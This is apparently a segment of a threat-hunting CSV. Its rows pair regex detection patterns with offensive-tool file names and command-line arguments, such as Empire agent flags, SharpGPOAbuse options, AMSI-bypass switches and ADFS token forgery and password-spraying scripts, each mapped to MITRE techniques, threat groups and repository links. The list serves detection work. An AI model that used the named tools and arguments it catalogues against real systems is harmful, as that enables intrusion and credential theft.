"* AddNewAdminUser.ahk*",".{0,1000}\sAddNewAdminUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","216"
"* Add-RemoteRegBackdoor.ps1*",".{0,1000}\sAdd\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","217"
"* address-info.nse*",".{0,1000}\saddress\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","218"
"* AddScriptToRegistry.ahk*",".{0,1000}\sAddScriptToRegistry\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","219"
"* AddTrustedDomain.py*",".{0,1000}\sAddTrustedDomain\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","220"
"* AddTrustedDomain.vba*",".{0,1000}\sAddTrustedDomain\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","221"
"* --AddUserRights --UserRights * --UserAccount * --GPOName *",".{0,1000}\s\-\-AddUserRights\s\-\-UserRights\s.{0,1000}\s\-\-UserAccount\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","222"
"* --AddUserScript --ScriptName * --ScriptContents * --GPOName *",".{0,1000}\s\-\-AddUserScript\s\-\-ScriptName\s.{0,1000}\s\-\-ScriptContents\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","223"
"* ADeleg.exe*",".{0,1000}\sADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","224"
"* adfsbrute.py*",".{0,1000}\sadfsbrute\.py.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","225"
"* --adfs-host * --krb-key * --krb-ticket *",".{0,1000}\s\-\-adfs\-host\s.{0,1000}\s\-\-krb\-key\s.{0,1000}\s\-\-krb\-ticket\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","226"
"* ADFSpoof.py*",".{0,1000}\sADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","227"
"* adfs-spray.py*",".{0,1000}\sadfs\-spray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","228"
"* adhunt.py *",".{0,1000}\sadhunt\.py\s.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","229"
"* adm2sys.py*",".{0,1000}\sadm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","230"
"* admin_persistence_winlogon.c*",".{0,1000}\sadmin_persistence_winlogon\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","232"
"* admin-panels.txt*",".{0,1000}\sadmin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","233"
"* ADPassHunt.GetGPPPassword*",".{0,1000}\sADPassHunt\.GetGPPPassword.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","234"
"* adPEAS.ps1*",".{0,1000}\sadPEAS\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","235"
"* adPEAS_DomainPolicy.Sys*",".{0,1000}\sadPEAS_DomainPolicy\.Sys.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","236"
"* adPEAS_out.txt*",".{0,1000}\sadPEAS_out\.txt.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","237"
"* adPEAS-Light.ps1*",".{0,1000}\sadPEAS\-Light\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","238"
"* AES_cryptor.py *",".{0,1000}\sAES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","242"
"* afp-brute.nse*",".{0,1000}\safp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","243"
"* afp-ls.nse*",".{0,1000}\safp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","244"
"* afp-path-vuln.nse*",".{0,1000}\safp\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","245"
"* afp-serverinfo.nse*",".{0,1000}\safp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","246"
"* afp-showmount.nse*",".{0,1000}\safp\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","247"
"* -AgentDelay *",".{0,1000}\s\-AgentDelay\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","248"
"* -AgentJitter *",".{0,1000}\s\-AgentJitter\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","249"
"* ajp-auth.nse*",".{0,1000}\sajp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","251"
"* ajp-brute.nse*",".{0,1000}\sajp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","252"
"* ajp-headers.nse*",".{0,1000}\sajp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","253"
"* ajp-methods.nse*",".{0,1000}\sajp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","254"
"* ajp-request.nse*",".{0,1000}\sajp\-request\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","255"
"* Alcatraz.exe*",".{0,1000}\sAlcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","256"
"* All_attack.txt*",".{0,1000}\sAll_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","257"
"* all_in_one_enum.ps1*",".{0,1000}\sall_in_one_enum\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","258"
"* allseeingeye-info.nse*",".{0,1000}\sallseeingeye\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","259"
"* Amnesiac.ps1*",".{0,1000}\sAmnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","261"
"* amqp-info.nse*",".{0,1000}\samqp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","262"
"* amsi_disable *",".{0,1000}\samsi_disable\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","263"
"* --am-si-bypass=*",".{0,1000}\s\-\-am\-si\-bypass\=.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","264"
"* amsikiller.py*",".{0,1000}\samsikiller\.py.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","265"
"* anti_analysis.exe*",".{0,1000}\santi_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","266"
"* anti_debug.exe*",".{0,1000}\santi_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","267"
"* Any passwords that were successfully sprayed have been output to*",".{0,1000}\sAny\spasswords\sthat\swere\ssuccessfully\ssprayed\shave\sbeen\soutput\sto.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","0","#content","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","268"
"* apc_injection.exe*",".{0,1000}\sapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","269"
"* api_hooking.exe*",".{0,1000}\sapi_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","270"
"* App-Bound Encryption Decryption process*",".{0,1000}\sApp\-Bound\sEncryption\sDecryption\sprocess.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","271"
"* --archive-type tar --mass-find * --mass-find-mode symlinks archive*",".{0,1000}\s\-\-archive\-type\star\s\-\-mass\-find\s.{0,1000}\s\-\-mass\-find\-mode\ssymlinks\sarchive.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","272"
